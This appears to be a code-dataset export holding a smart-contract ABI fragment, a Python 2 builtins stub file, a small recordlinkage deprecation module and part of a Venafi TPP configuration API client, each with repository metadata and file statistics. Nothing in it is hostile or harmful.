6"},{"internalType":"bytes32","name":"originTxId","type":"bytes32"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"contractAddress","type":"address"},{"internalType":"uint256","name":"supplyDecrement","type":"uint256"}],"name":"removeSwapToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"swapSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"chainId","type":"uint256"}],"name":"unwrap","outputs":[],"stateMutability":"nonpayable","type":"function"}]
| 3,557
| 7,113
| 0.669806
| 681
| 7,114
| 6.997063
| 0.093979
| 0.115425
| 0.144806
| 0.10703
| 0.928646
| 0.912277
| 0.854355
| 0.81532
| 0.668416
| 0.576076
| 0
| 0.026719
| 0.000422
| 7,114
| 1
| 7,114
| 7,114
| 0.643369
| 0
| 0
| 0
| 0
| 0
| 0.648861
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
269dd25e35da343ee87d9f4a90e6c5c71a29052f
| 20,533
|
py
|
Python
|
tools/scitools/conf/understand/python/python2/__builtin__.py
|
brucegua/moocos
|
575c161cfa35e220f10d042e2e5ca18773691695
|
[
"Apache-2.0"
] | 1
|
2020-01-20T21:26:46.000Z
|
2020-01-20T21:26:46.000Z
|
tools/scitools/conf/understand/python/python2/__builtin__.py
|
brucegua/moocos
|
575c161cfa35e220f10d042e2e5ca18773691695
|
[
"Apache-2.0"
] | null | null | null |
tools/scitools/conf/understand/python/python2/__builtin__.py
|
brucegua/moocos
|
575c161cfa35e220f10d042e2e5ca18773691695
|
[
"Apache-2.0"
] | null | null | null |
class basestring(object):
__new__ = 0
class bool(int):
def __and__(): pass
def __or__(): pass
def __rand__(): pass
def __repr__(): pass
def __ror__(): pass
def __rxor__(): pass
def __str__(): pass
def __xor__(): pass
__new__ = 0
class buffer(object):
def __add__(): pass
def __cmp__(): pass
def __delitem__(): pass
def __delslice__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getslice__(): pass
def __hash__(): pass
def __len__(): pass
def __mul__(): pass
def __repr__(): pass
def __rmul__(): pass
def __setitem__(): pass
def __setslice__(): pass
def __str__(): pass
__new__ = 0
class bytearray(object):
def __add__(): pass
def __alloc__(): pass
def __contains__(): pass
def __delitem__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __gt__(): pass
def __iadd__(): pass
def __imul__(): pass
def __init__(): pass
def __iter__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mul__(): pass
def __ne__(): pass
def __reduce__(): pass
def __repr__(): pass
def __rmul__(): pass
def __setitem__(): pass
def __sizeof__(): pass
def __str__(): pass
def append(): pass
def capitalize(): pass
def center(): pass
def count(): pass
def decode(): pass
def endswith(): pass
def expandtabs(): pass
def extend(): pass
def find(): pass
def index(): pass
def insert(): pass
def isalnum(): pass
def isalpha(): pass
def isdigit(): pass
def islower(): pass
def isspace(): pass
def istitle(): pass
def isupper(): pass
def join(): pass
def ljust(): pass
def lower(): pass
def lstrip(): pass
def partition(): pass
def pop(): pass
def remove(): pass
def replace(): pass
def reverse(): pass
def rfind(): pass
def rindex(): pass
def rjust(): pass
def rpartition(): pass
def rsplit(): pass
def rstrip(): pass
def split(): pass
def splitlines(): pass
def startswith(): pass
def strip(): pass
def swapcase(): pass
def title(): pass
def translate(): pass
def upper(): pass
def zfill(): pass
__new__ = 0
fromhex = 0
class str(basestring):
def __add__(): pass
def __contains__(): pass
def __eq__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getnewargs__(): pass
def __getslice__(): pass
def __gt__(): pass
def __hash__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __sizeof__(): pass
def __str__(): pass
def capitalize(): pass
def center(): pass
def count(): pass
def decode(): pass
def encode(): pass
def endswith(): pass
def expandtabs(): pass
def find(): pass
def format(): pass
def index(): pass
def isalnum(): pass
def isalpha(): pass
def isdigit(): pass
def islower(): pass
def isspace(): pass
def istitle(): pass
def isupper(): pass
def join(): pass
def ljust(): pass
def lower(): pass
def lstrip(): pass
def partition(): pass
def replace(): pass
def rfind(): pass
def rindex(): pass
def rjust(): pass
def rpartition(): pass
def rsplit(): pass
def rstrip(): pass
def split(): pass
def splitlines(): pass
def startswith(): pass
def strip(): pass
def swapcase(): pass
def title(): pass
def translate(): pass
def upper(): pass
def zfill(): pass
__new__ = 0
bytes = str
class classmethod(object):
def __get__(): pass
def __getattribute__(): pass
def __init__(): pass
__func__ = 0
__new__ = 0
class complex(object):
def __abs__(): pass
def __add__(): pass
def __coerce__(): pass
def __div__(): pass
def __divmod__(): pass
def __eq__(): pass
def __float__(): pass
def __floordiv__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getnewargs__(): pass
def __gt__(): pass
def __hash__(): pass
def __int__(): pass
def __le__(): pass
def __long__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __neg__(): pass
def __nonzero__(): pass
def __pos__(): pass
def __pow__(): pass
def __radd__(): pass
def __rdiv__(): pass
def __rdivmod__(): pass
def __repr__(): pass
def __rfloordiv__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __rpow__(): pass
def __rsub__(): pass
def __rtruediv__(): pass
def __str__(): pass
def __sub__(): pass
def __truediv__(): pass
def conjugate(): pass
imag = 0
real = 0
__new__ = 0
class dict(object):
def __cmp__(): pass
def __contains__(): pass
def __delitem__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __gt__(): pass
def __init__(): pass
def __iter__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __ne__(): pass
def __repr__(): pass
def __setitem__(): pass
def __sizeof__(): pass
def clear(): pass
def copy(): pass
def get(): pass
def has_key(): pass
def items(): pass
def iteritems(): pass
def iterkeys(): pass
def itervalues(): pass
def keys(): pass
def pop(): pass
def popitem(): pass
def setdefault(): pass
def update(): pass
def values(): pass
def viewitems(): pass
def viewkeys(): pass
def viewvalues(): pass
__hash__ = None
__new__ = 0
fromkeys = 0
class enumerate(object):
def __getattribute__(): pass
def __iter__(): pass
def next(): pass
__new__ = 0
class file(object):
def __delattr__(): pass
def __enter__(): pass
def __exit__(): pass
def __getattribute__(): pass
def __init__(): pass
def __iter__(): pass
def __repr__(): pass
def __setattr__(): pass
def close(): pass
def fileno(): pass
def flush(): pass
def isatty(): pass
def next(): pass
def read(): pass
def readinto(): pass
def readline(): pass
def readlines(): pass
def seek(): pass
def tell(): pass
def truncate(): pass
def write(): pass
def writelines(): pass
def xreadlines(): pass
closed = 0
errors = 0
mode = 0
name = 0
newlines = 0
softspace = 0
__new__ = 0
class float(object):
def __abs__(): pass
def __add__(): pass
def __coerce__(): pass
def __div__(): pass
def __divmod__(): pass
def __eq__(): pass
def __float__(): pass
def __floordiv__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getnewargs__(): pass
def __gt__(): pass
def __hash__(): pass
def __int__(): pass
def __le__(): pass
def __long__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __neg__(): pass
def __nonzero__(): pass
def __pos__(): pass
def __pow__(): pass
def __radd__(): pass
def __rdiv__(): pass
def __rdivmod__(): pass
def __repr__(): pass
def __rfloordiv__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __rpow__(): pass
def __rsub__(): pass
def __rtruediv__(): pass
def __str__(): pass
def __sub__(): pass
def __truediv__(): pass
def __trunc__(): pass
def as_integer_ratio(): pass
def conjugate(): pass
def hex(): pass
def is_integer(): pass
imag = 0
real = 0
__getformat__ = 0
__new__ = 0
__setformat__ = 0
fromhex = 0
class frozenset(object):
def __and__(): pass
def __cmp__(): pass
def __contains__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __gt__(): pass
def __hash__(): pass
def __iter__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __ne__(): pass
def __or__(): pass
def __rand__(): pass
def __reduce__(): pass
def __repr__(): pass
def __ror__(): pass
def __rsub__(): pass
def __rxor__(): pass
def __sizeof__(): pass
def __sub__(): pass
def __xor__(): pass
def copy(): pass
def difference(): pass
def intersection(): pass
def isdisjoint(): pass
def issubset(): pass
def issuperset(): pass
def symmetric_difference(): pass
def union(): pass
__new__ = 0
class int(object):
def __abs__(): pass
def __add__(): pass
def __and__(): pass
def __cmp__(): pass
def __coerce__(): pass
def __div__(): pass
def __divmod__(): pass
def __float__(): pass
def __floordiv__(): pass
def __format__(): pass
def __getattribute__(): pass
def __getnewargs__(): pass
def __hash__(): pass
def __hex__(): pass
def __index__(): pass
def __int__(): pass
def __invert__(): pass
def __long__(): pass
def __lshift__(): pass
def __mod__(): pass
def __mul__(): pass
def __neg__(): pass
def __nonzero__(): pass
def __oct__(): pass
def __or__(): pass
def __pos__(): pass
def __pow__(): pass
def __radd__(): pass
def __rand__(): pass
def __rdiv__(): pass
def __rdivmod__(): pass
def __repr__(): pass
def __rfloordiv__(): pass
def __rlshift__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __ror__(): pass
def __rpow__(): pass
def __rrshift__(): pass
def __rshift__(): pass
def __rsub__(): pass
def __rtruediv__(): pass
def __rxor__(): pass
def __str__(): pass
def __sub__(): pass
def __truediv__(): pass
def __trunc__(): pass
def __xor__(): pass
def bit_length(): pass
def conjugate(): pass
denominator = 0
imag = 0
numerator = 0
real = 0
__new__ = 0
class list(object):
def __add__(): pass
def __contains__(): pass
def __delitem__(): pass
def __delslice__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getslice__(): pass
def __gt__(): pass
def __iadd__(): pass
def __imul__(): pass
def __init__(): pass
def __iter__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __reversed__(): pass
def __rmul__(): pass
def __setitem__(): pass
def __setslice__(): pass
def __sizeof__(): pass
def append(): pass
def count(): pass
def extend(): pass
def index(): pass
def insert(): pass
def pop(): pass
def remove(): pass
def reverse(): pass
def sort(): pass
__hash__ = None
__new__ = 0
class long(object):
def __abs__(): pass
def __add__(): pass
def __and__(): pass
def __cmp__(): pass
def __coerce__(): pass
def __div__(): pass
def __divmod__(): pass
def __float__(): pass
def __floordiv__(): pass
def __format__(): pass
def __getattribute__(): pass
def __getnewargs__(): pass
def __hash__(): pass
def __hex__(): pass
def __index__(): pass
def __int__(): pass
def __invert__(): pass
def __long__(): pass
def __lshift__(): pass
def __mod__(): pass
def __mul__(): pass
def __neg__(): pass
def __nonzero__(): pass
def __oct__(): pass
def __or__(): pass
def __pos__(): pass
def __pow__(): pass
def __radd__(): pass
def __rand__(): pass
def __rdiv__(): pass
def __rdivmod__(): pass
def __repr__(): pass
def __rfloordiv__(): pass
def __rlshift__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __ror__(): pass
def __rpow__(): pass
def __rrshift__(): pass
def __rshift__(): pass
def __rsub__(): pass
def __rtruediv__(): pass
def __rxor__(): pass
def __sizeof__(): pass
def __str__(): pass
def __sub__(): pass
def __truediv__(): pass
def __trunc__(): pass
def __xor__(): pass
def bit_length(): pass
def conjugate(): pass
denominator = 0
imag = 0
numerator = 0
real = 0
__new__ = 0
class memoryview(object):
def __delitem__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __gt__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __ne__(): pass
def __repr__(): pass
def __setitem__(): pass
def tobytes(): pass
def tolist(): pass
format = 0
itemsize = 0
ndim = 0
readonly = 0
shape = 0
strides = 0
suboffsets = 0
__new__ = 0
class object: pass
class property(object):
def __delete__(): pass
def __get__(): pass
def __getattribute__(): pass
def __init__(): pass
def __set__(): pass
def deleter(): pass
def getter(): pass
def setter(): pass
fdel = 0
fget = 0
fset = 0
__new__ = 0
class reversed(object):
def __getattribute__(): pass
def __iter__(): pass
def __length_hint__(): pass
def next(): pass
__new__ = 0
class set(object):
def __and__(): pass
def __cmp__(): pass
def __contains__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __gt__(): pass
def __iand__(): pass
def __init__(): pass
def __ior__(): pass
def __isub__(): pass
def __iter__(): pass
def __ixor__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __ne__(): pass
def __or__(): pass
def __rand__(): pass
def __reduce__(): pass
def __repr__(): pass
def __ror__(): pass
def __rsub__(): pass
def __rxor__(): pass
def __sizeof__(): pass
def __sub__(): pass
def __xor__(): pass
def add(): pass
def clear(): pass
def copy(): pass
def difference(): pass
def difference_update(): pass
def discard(): pass
def intersection(): pass
def intersection_update(): pass
def isdisjoint(): pass
def issubset(): pass
def issuperset(): pass
def pop(): pass
def remove(): pass
def symmetric_difference(): pass
def symmetric_difference_update(): pass
def union(): pass
def update(): pass
__hash__ = None
__new__ = 0
class slice(object):
def __cmp__(): pass
def __getattribute__(): pass
def __hash__(): pass
def __reduce__(): pass
def __repr__(): pass
def indices(): pass
start = 0
step = 0
stop = 0
__new__ = 0
class staticmethod(object):
def __get__(): pass
def __getattribute__(): pass
def __init__(): pass
__func__ = 0
__new__ = 0
class str(basestring):
def __add__(): pass
def __contains__(): pass
def __eq__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getnewargs__(): pass
def __getslice__(): pass
def __gt__(): pass
def __hash__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __sizeof__(): pass
def __str__(): pass
def capitalize(): pass
def center(): pass
def count(): pass
def decode(): pass
def encode(): pass
def endswith(): pass
def expandtabs(): pass
def find(): pass
def format(): pass
def index(): pass
def isalnum(): pass
def isalpha(): pass
def isdigit(): pass
def islower(): pass
def isspace(): pass
def istitle(): pass
def isupper(): pass
def join(): pass
def ljust(): pass
def lower(): pass
def lstrip(): pass
def partition(): pass
def replace(): pass
def rfind(): pass
def rindex(): pass
def rjust(): pass
def rpartition(): pass
def rsplit(): pass
def rstrip(): pass
def split(): pass
def splitlines(): pass
def startswith(): pass
def strip(): pass
def swapcase(): pass
def title(): pass
def translate(): pass
def upper(): pass
def zfill(): pass
__new__ = 0
class super(object):
def __get__(): pass
def __getattribute__(): pass
def __init__(): pass
def __repr__(): pass
__self__ = 0
__self_class__ = 0
__thisclass__ = 0
__new__ = 0
class tuple(object):
def __add__(): pass
def __contains__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getnewargs__(): pass
def __getslice__(): pass
def __gt__(): pass
def __hash__(): pass
def __iter__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __rmul__(): pass
def __sizeof__(): pass
def count(): pass
def index(): pass
__new__ = 0
type = 0
class unicode(basestring):
def __add__(): pass
def __contains__(): pass
def __eq__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getnewargs__(): pass
def __getslice__(): pass
def __gt__(): pass
def __hash__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __sizeof__(): pass
def __str__(): pass
def capitalize(): pass
def center(): pass
def count(): pass
def decode(): pass
def encode(): pass
def endswith(): pass
def expandtabs(): pass
def find(): pass
def format(): pass
def index(): pass
def isalnum(): pass
def isalpha(): pass
def isdecimal(): pass
def isdigit(): pass
def islower(): pass
def isnumeric(): pass
def isspace(): pass
def istitle(): pass
def isupper(): pass
def join(): pass
def ljust(): pass
def lower(): pass
def lstrip(): pass
def partition(): pass
def replace(): pass
def rfind(): pass
def rindex(): pass
def rjust(): pass
def rpartition(): pass
def rsplit(): pass
def rstrip(): pass
def split(): pass
def splitlines(): pass
def startswith(): pass
def strip(): pass
def swapcase(): pass
def title(): pass
def translate(): pass
def upper(): pass
def zfill(): pass
__new__ = 0
class xrange(object):
def __getattribute__(): pass
def __getitem__(): pass
def __iter__(): pass
def __len__(): pass
def __reduce__(): pass
def __repr__(): pass
def __reversed__(): pass
__new__ = 0
def __import__(): pass
def abs(): pass
def all(): pass
def any(): pass
def apply(): pass
def bin(): pass
def callable(): pass
def chr(): pass
def cmp(): pass
def coerce(): pass
def compile(): pass
def delattr(): pass
def dir(): pass
def divmod(): pass
def eval(): pass
def execfile(): pass
def filter(): pass
def format(): pass
def getattr(): pass
def globals(): pass
def hasattr(): pass
def hash(): pass
def hex(): pass
def id(): pass
def input(): pass
def intern(): pass
def isinstance(): pass
def issubclass(): pass
def iter(): pass
def len(): pass
def locals(): pass
def map(): pass
def max(): pass
def min(): pass
def next(): pass
def oct(): pass
def open(): pass
def ord(): pass
def pow(): pass
def print(): pass
def range(): pass
def raw_input(): pass
def reduce(): pass
def reload(): pass
def repr(): pass
def round(): pass
def setattr(): pass
def sorted(): pass
def sum(): pass
def unichr(): pass
def vars(): pass
def zip(): pass
Ellipsis = 0
False = 0
None = 0
NotImplemented = 0
True = 0
__debug__ = True
copyright = 0
credits = 0
exit = 0
help = 0
license = 0
quit = 0
| 22.865256
| 43
| 0.59587
| 2,499
| 20,533
| 4.108844
| 0.112845
| 0.490164
| 0.04441
| 0.051422
| 0.830444
| 0.773666
| 0.76305
| 0.753701
| 0.674036
| 0.674036
| 0
| 0.005399
| 0.287342
| 20,533
| 897
| 44
| 22.890747
| 0.696303
| 0
| 0
| 0.803738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.871495
| 0.001168
| null | null | 0.001168
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
26c40db15bfa86e70170c35a59ec737a6ac55de2
| 280
|
py
|
Python
|
recordlinkage/deprecated.py
|
LuciaBaldassini/recordlinkage
|
8892d917caf82131ddce3ad2559570b2a0caca02
|
[
"BSD-3-Clause"
] | 641
|
2016-05-03T14:44:55.000Z
|
2022-03-29T19:59:42.000Z
|
recordlinkage/deprecated.py
|
LuciaBaldassini/recordlinkage
|
8892d917caf82131ddce3ad2559570b2a0caca02
|
[
"BSD-3-Clause"
] | 143
|
2015-11-23T10:58:41.000Z
|
2022-03-24T00:18:00.000Z
|
recordlinkage/deprecated.py
|
LuciaBaldassini/recordlinkage
|
8892d917caf82131ddce3ad2559570b2a0caca02
|
[
"BSD-3-Clause"
] | 126
|
2016-09-29T20:04:25.000Z
|
2022-03-25T12:52:25.000Z
|
class PairsCore(object):
def __init__(self, *args, **kwargs):
raise AttributeError("this class was removed in version 0.12.0")
class Pairs(object):
def __init__(self, *args, **kwargs):
raise AttributeError("this class was removed in version 0.12.0")
| 21.538462
| 72
| 0.671429
| 38
| 280
| 4.736842
| 0.473684
| 0.1
| 0.144444
| 0.188889
| 0.866667
| 0.866667
| 0.866667
| 0.866667
| 0.866667
| 0.866667
| 0
| 0.036036
| 0.207143
| 280
| 12
| 73
| 23.333333
| 0.774775
| 0
| 0
| 0.666667
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
f83dea0dbf0df9502e0a680559c92055222c5548
| 37,188
|
py
|
Python
|
pytpp/api/websdk/endpoints/config.py
|
Venafi/pytpp
|
42af655b2403b8c9447c86962abd4aaa0201f646
|
[
"MIT"
] | 4
|
2022-02-04T23:58:55.000Z
|
2022-02-15T18:53:08.000Z
|
pytpp/api/websdk/endpoints/config.py
|
Venafi/pytpp
|
42af655b2403b8c9447c86962abd4aaa0201f646
|
[
"MIT"
] | null | null | null |
pytpp/api/websdk/endpoints/config.py
|
Venafi/pytpp
|
42af655b2403b8c9447c86962abd4aaa0201f646
|
[
"MIT"
] | null | null | null |
from typing import List
from pytpp.api.api_base import API, APIResponse, api_response_property
from pytpp.properties.response_objects.config import Config
class _Config:
def __init__(self, api_obj):
self.AddDnValue = self._AddDnValue(api_obj=api_obj)
self.AddPolicyValue = self._AddPolicyValue(api_obj=api_obj)
self.AddValue = self._AddValue(api_obj=api_obj)
self.ClearAttribute = self._ClearAttribute(api_obj=api_obj)
self.ClearPolicyAttribute = self._ClearPolicyAttribute(api_obj=api_obj)
self.ContainableClasses = self._ContainableClasses(api_obj=api_obj)
self.Create = self._Create(api_obj=api_obj)
self.DefaultDN = self._DefaultDN(api_obj=api_obj)
self.Delete = self._Delete(api_obj=api_obj)
self.DnToGuid = self._DnToGuid(api_obj=api_obj)
self.Enumerate = self._Enumerate(api_obj=api_obj)
self.EnumerateAll = self._EnumerateAll(api_obj=api_obj)
self.EnumerateObjectsDerivedFrom = self._EnumerateObjectsDerivedFrom(api_obj=api_obj)
self.EnumeratePolicies = self._EnumeratePolicies(api_obj=api_obj)
self.Find = self._Find(api_obj=api_obj)
self.FindObjectsOfClass = self._FindObjectsOfClass(api_obj=api_obj)
self.FindPolicy = self._FindPolicy(api_obj=api_obj)
self.GetHighestRevision = self._GetHighestRevision(api_obj=api_obj)
self.GetRevision = self._GetRevision(api_obj=api_obj)
self.GuidToDn = self._GuidToDn(api_obj=api_obj)
self.IdInfo = self._IdInfo(api_obj=api_obj)
self.IsValid = self._IsValid(api_obj=api_obj)
self.MutateObject = self._MutateObject(api_obj=api_obj)
self.Read = self._Read(api_obj=api_obj)
self.ReadAll = self._ReadAll(api_obj=api_obj)
self.ReadDn = self._ReadDn(api_obj=api_obj)
self.ReadDnReferences = self._ReadDnReferences(api_obj=api_obj)
self.ReadEffectivePolicy = self._ReadEffectivePolicy(api_obj=api_obj)
self.ReadPolicy = self._ReadPolicy(api_obj=api_obj)
self.RemoveDnValue = self._RemoveDnValue(api_obj=api_obj)
self.RemovePolicyValue = self._RemovePolicyValue(api_obj=api_obj)
self.RenameObject = self._RenameObject(api_obj=api_obj)
self.Write = self._Write(api_obj=api_obj)
self.WriteDn = self._WriteDn(api_obj=api_obj)
self.WritePolicy = self._WritePolicy(api_obj=api_obj)
class _AddDnValue(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/AddDnValue')
def post(self, object_dn: str, attribute_name: str, value: str):
body = {
'ObjectDN': object_dn,
'AttributeName': attribute_name,
'Value': value
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _AddPolicyValue(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/AddPolicyValue')
def post(self, object_dn: str, attribute_name: str, class_name: str, value: str, locked: bool):
body = {
'ObjectDN': object_dn,
'AttributeName': attribute_name,
'Class': class_name,
'Value': value,
'Locked': locked
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _AddValue(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/AddValue')
def post(self, object_dn: str, attribute_name: str, value: str):
body = {
'ObjectDN': object_dn,
'AttributeName': attribute_name,
'Value': value,
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _ClearAttribute(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/ClearAttribute')
def post(self, object_dn: str, attribute_name: str):
body = {
'ObjectDN': object_dn,
'AttributeName': attribute_name
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _ClearPolicyAttribute(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/ClearPolicyAttribute')
def post(self, object_dn: str, class_name: str, attribute_name: str):
body = {
'ObjectDN': object_dn,
'Class': class_name,
'AttributeName': attribute_name
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _ContainableClasses(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/ContainableClasses')
def post(self, object_dn: str):
body = {
'ObjectDN': object_dn
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def class_names(self) -> List[str]:
return self._from_json(key='ClassNames')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _CountObjects(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/CountObjects')
def post(self, object_dn: str, type_name: str, recursive: bool = False, pattern: str = None):
body = {
'ObjectDN': object_dn,
'Type': type_name,
'Pattern': pattern,
'Recursive': recursive
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def count(self) -> int:
return self._from_json(key='Count')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _Create(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/Create')
def post(self, object_dn: str, class_name: str, name_attribute_list: list):
body = {
"ObjectDN": object_dn,
"Class": class_name,
"NameAttributeList": name_attribute_list
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def object(self):
return Config.Object(self._from_json(key='Object'))
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _DefaultDN(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/DefaultDN')
def post(self, default_dn: str):
body = {
'DefaultDN': default_dn
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def default_dn(self) -> str:
return self._from_json(key='DefaultDN')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _Delete(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/Delete')
def post(self, object_dn: str, recursive: bool = False):
body = {
"ObjectDN": object_dn,
"Recursive": recursive
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _DnToGuid(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/DnToGuid')
def post(self, object_dn: str):
body = {
"ObjectDN": object_dn,
}
class _Response(APIResponse):
def __init__(self, response):
super().__init__(response=response)
@property
@api_response_property()
def class_name(self) -> str:
return self._from_json(key='ClassName')
@property
@api_response_property()
def guid(self) -> str:
return self._from_json(key='GUID')
@property
@api_response_property()
def revision(self) -> str:
return self._from_json(key='Revision')
@property
@api_response_property()
def hierarchical_guid(self) -> str:
return self._from_json(key='HierarchicalGUID')
@property
@api_response_property()
def result(self):
return Config.Result(self._from_json(key='Result'))
return _Response(response=self._post(data=body))
class _Enumerate(API):
def __init__(self, api_obj):
super().__init__(api_obj=api_obj, url='/Config/Enumerate')
def post(self, object_dn: str = None, recursive: bool = False, pattern: str = None):
body = {
"ObjectDN": object_dn,
"Recursive": recursive,
"Pattern": pattern
}
